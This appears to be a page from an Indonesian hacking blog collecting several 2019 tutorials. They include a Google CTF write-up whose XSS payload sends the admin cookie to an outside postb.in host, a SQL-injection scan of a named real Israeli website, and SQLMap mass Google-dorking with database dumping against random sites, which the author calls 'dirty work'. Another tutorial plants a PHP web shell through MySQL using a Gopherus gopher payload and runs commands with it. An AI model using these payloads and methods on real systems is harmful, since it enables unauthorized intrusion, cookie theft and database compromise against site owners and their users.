No More Yukinoshita 47. I'm Done

If You Found Every Social Media Platform Using "Yukinoshita 47" Name That's The Other Guy.

Copyright © Yukinoshita 47 | Published By Gooyaabi Templates | Powered By Blogger
Design by WebSuccessAgency | Blogger Theme by NewBloggerThemes.com | BTheme.net

My Motivation

My Motivation



Seal

Always Trust Yourself And Use Your Opportunity



Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Jumat, 02 Agustus 2019

Parrot Linux : XSSizer Tool Web Based Untuk Mencari Bug XSS

ok gayn kembali lagi dengan gw Yukinoshita 47 kali ini gw bikin artikel receh buat memperbanyak konten blog aja wkwkwkwkwk

oke langsung aja kita mulai

pertama buka terminal lalu input perintah

~$ sudo su

kemudian tekan enter lalu input password lalu tekan enter lagi


setelah itu masuk dulu ke direktori webserver dengan perintah

~# cd /var/www/html/

kemudian tekan enter


kemudian clone dulu XSSizer nya dengan perintah

~# git clone https://github.com/noLogicXD/xssizer.git

kemudian tekan enter


beri hak akses ke direktori nya dengan perintah

~# chmod 777 xssizer/

kemudian tekan enter


jalankan service apache dengan perintah

~# service apache2 start

kemudian tekan enter


jalankan tool nya di browser dengan url http://localhost/xssizer/pro.php


dan XSSizer siap digunakan.




Sabtu, 20 Juli 2019

Google CTF 2019 : Government Agriculture Network [Write Up]


Hallo gayn kembali lagi dengan gw Yukinoshita 47 yapp lanjutkan bermain Google CTF 2019 kali ini challenge nya Government Agriculture Network dengan kategori web berikut challenge nya.


langsung aja gw buka https://govagriculture.web.ctfcompetition.com dan diweb nya terdapat form posting konten


 kemudian gw post asal asalan muncul lah seperti ini ya konfirmasi web nya itu ya post nya masuk dan nunggu admin untuk lihat post nya



kemudian gw buka postbin untuk membuat payload XSS nya karena disini gw mau inject payload XSS grab cookie admin web nya.


setelah itu gw membuat payload yang didapat url nya dari postbin
kemudian gw inject dengan kode payload <script>location.href="https://postb.in/1565680049167-8349444575142?cookie='+document.cookie;"</script>  kemudian klik Submit



dan respons dari web nya adalah seperti ini nah sesuai dugaan gw web nya vuln XSS dan payload XSS grab cookie nya bekerja dengan baik wkwkwkwkwk.


 dan flag nya adalah CTF{8aaa2f34b392b415601804c2f5f0f24e}


dan tentu saja solved wkwkwkwk/


Selasa, 04 Juni 2019

Android : Cara Mudah Hunting Bug SQL Injection Dengan Droidbug SQLi Spyder


Halo gaes kembali lg dengan gw yukinoshita47 kali ini gw mau sharing tutorial di Android lg ne yaitu Cara Mudah Hunting Bug SQL Injection Dengan Droidbug SQLi Spyder wkwkwkwk.

Oke langsung aja kita mulai yuk

Pertama lu bisa install Droidbug SQLi Spyder di Playstore ada 2 versi yaitu versi free (banyak iklan) dan versi pro (tanpa iklan tapi bayar) gw disini pake yg free aja wkwkwkwkwk.


Kemudian pilih by Site


Input target lu disini gw live kan ke web israel url nya http://www.bestapet.co.il jadi SS nya tidak gw sensor karena gw jg bagian dari barisan anti israel Wkwkwkwkwk.

Kemudian disisi kanan kalian bisa sesuaikan berapa link yang akan di scan disini gw pilih 250 link aja (bukan link bokep ya).


Kemudian klik scan


Ntar keliatan tuh mana url atau link yang bisa dijadikan inject point keliatan kok status vulnerable dan not vulnerable nya.



Dan jika sudah selesai akan ada pemberitahuan bahwa proses scanning sudah selesai.


Untuk melihat hasil scanning nya tekan menu di pojok kiri atas lalu pilih result.


Dan keliatan ntar mana url yang bisa dijadikan inject point nya.


Kemudian pilih link yang mau digunakan untuk inject point nya lalu pilih copy to clipboard.


Bagaimana cara exploitasi nya ?

Disini gw jelasin ada 2 pilihan untuk exploitasi bug nya.

Pertama lu bisa menggunakan metode exploitasi manual SQL Injection di Hackbar nya Droidbug SQLi Spyder ini.

Cara nya tekan menu pojok kiri atas lalu pilih Hackbar.


Kemudian lu bisa exploitasi bug nya seperti lu gunain hackbar SQL Injection yang ada di PC ataupun Platform lain.


Cara yang kedua lu bisa gunakan SQLMap untuk exploitasi bug SQL nya secara otomatis jika lu malas gunain metode yang manual.



Oke cukup simple kan wkwkwk oke sampai disini dulu sampai jumpa di tutorial berikut nya.

NB : Tidak ada dampak kerusakan terhadap situs web bestapet.co.il karena web tersebut hanya jadi bahan demo uji coba tools saja tidak ada aktivitas yg bersifat merusak terhadap web tersebut.

Mohon Maaf Atas Ketidaknyaman nya , dan segala kesalahan teknis dan non-teknis nya Sekian dan Terimakasih


Senin, 03 Juni 2019

Android : Audit Keamanan Website Dengan Vulners Scanner


Halo gaes kembali lagi dengan gw Yukinoshita47 kali ini gw mau share tutorial di Android lagi kali ini mengenai tools yang mendukung aktivitas pentest kalian di platform Android dan langsung aja kita mulai.

Pertama install Vulners Scanner dari Playstore.


Input url target pentest lu kemudian tekan enter atau klik tanda ➡ 


Kemudian nanti akan muncul informasi nilai Resiko bug yang ada di target lu.


Jika lu tekan pemberitahuan platform yang ada bug nya contoh disini php - 5.3.29 maka akan muncul informasi jenis bug, nomor CVE, dan skor/nilai resiko nya seperti gambar dibawah.


Dan untuk mengextract atau generate laporan scanner nya tekan report.


Dan laporan ouput scanner tersebut akan muncul dalam bentuk PDF dan bisa digunakan sebagai lampiran bukti pendukung laporan pentest kalian.



Cukup mudah kan Wkwkwkwkwk namun sebaik nya jika informasi dari tool ini web target pentest nya ada bug ya kalian harus uji bug tersebut atau exploitasi atau analisa bug nya secara manual karena informasi output dari tools pentest bisa jadi berpotensi informasi false positive yg artinya bug tidak ada namun dibilang ada oleh tools nya.

Oke cukup sampai disini dulu sampai jumpa di tutor berikut nya.

Sekian dan terimakasih.


Minggu, 02 Juni 2019

Parrot Linux : Mass Auto Dorking dan SQL Injection Dengan SQLMap


Halo gaes kembali lagi dengan gw Yukinoshita 47 kali ini gw mau share tutorial lanjutan sqlmap mungkin sebelum nya kalian sudah liat tutorial gw yang SQLMap juga yaitu :




kali ini gw mau share trik mudah untuk melakukan pekerjaan kotor kalian wkwkwkwkwk ya mulai dari dorking, vulnerability analysis sql nya dan exploitasi database nya semua nya dikerjakan oleh SQLMap itu sendiri lumayan buat menghemat waktu dan tenaga wkwkwkwkwk.

oke langsung aja pertama untuk memulai Mass Auto Dorking dan SQL Injection Dengan SQLMap perintah nya adalah :

sqlmap -g "dork sqli andalan mu" --dbs

contoh

sqlmap -g "inurl:php?id= site:id" --dbs

kemudian tekan enter


nah nanti sqlmap akan memberitahu lu berapa jumlah target yang nemu dari hasil pencarian nya disini ada 82 website yang siap untuk di analisa dan di eksekusi bug sql nya.

jika lu ingin lanjut tekan y untuk lewati atau skip ke target berikut nya tekan n dan untuk mengakhiri tekan q 



disini gw mau skip gw tekan n kemudian tekan enter 


lanjut jika ingin menganalisan bug sql target tekan y kemudian tekan enter 


jika target tidak vulnerable terhadap bug sql maka sqlmap akan langsung skip dan melanjutkan ke target lainnya jika lu ingin lanjut tekan y untuk lewati atau skip ke target berikut nya tekan n dan untuk mengakhiri tekan q


oke cukup sampai disini dulu ya tutorial nya ntar gw share lagi tutorial2 berikut nya.



Rabu, 29 Mei 2019

Parrot Linux : Exploitasi MySQL Dengan Gopherus 2 - Upload Shell


Halo gaes kembali lagi dengan gw yukinoshita 47 kali ini gw mau sharing Gopherus lagi ini wkwkwkwk cerita ini adalah lanjutan dari sebelum nya https://yukinoshita47.blogspot.com/2019/05/parrot-linux-exploitasi-mysql-dengan.html ya masih di localhost wkwkwkwk mungkin nanti baru gw coba versi remote nya.

oke langsung aja ya gaes pertama masuk dulu ke root dengan perintah

sudo su

kemudian tekan enter


lalu buat payload gopher nya dengan perintah

gopherus --exploit mysql

kemudian tekan enter

kemudian pada bagian

Give MySQL username (isi username mysql lu contoh): root

kemudian tekan enter

Give query to execute (isi perintah MySQL nya untuk generate shell): select "<?php system($_REQUEST['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php'

tekan enter lagi

dan url gopher payload nya pun muncul


kemudian eksekusi payload nya dengan perintah

curl gopher://127.0.0.1:3306/_%a3%01%85%a6%ff%01%01%21%72%6f%6f%74%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%53%03%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%73%79%73%74%65%6d%28%24%5f%52%45%51%55%45%53%54%5b%27%63%6d%64%27%5d%29%3b%20%3f%3e%22%20%49%4e%54%4f%20%4f%55%54%46%49%4c%45%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%73%68%65%6c%6c%2e%70%68%70%27%01%01 --output shell.log

kemudian tekan enter


kemudian liat output nya apakah upload shell nya berhasil atau kagak

cat shell.log

kemudian tekan enter

dan disini berhasil upload shelll sesuai perintah mysql tadi di /var/www/html/


kemudian akses dibrowser deh shell nya disini http://127.0.0.1/shell.php

cara eksekusi shell nya contoh http://127.0.0.1/shell.php?cmd=id 

dan output nya keliatan seperti gambar dibawah ini


via terminal juga bisa kok dengan perintah curl contoh

curl http://127.0.0.1/shell.php?cmd=id

kemudian tekan enter

dan voila



oke sampai disini aja tutorial unfaedah ini ntar gw share lagi kalo gw dapat metode lainnya.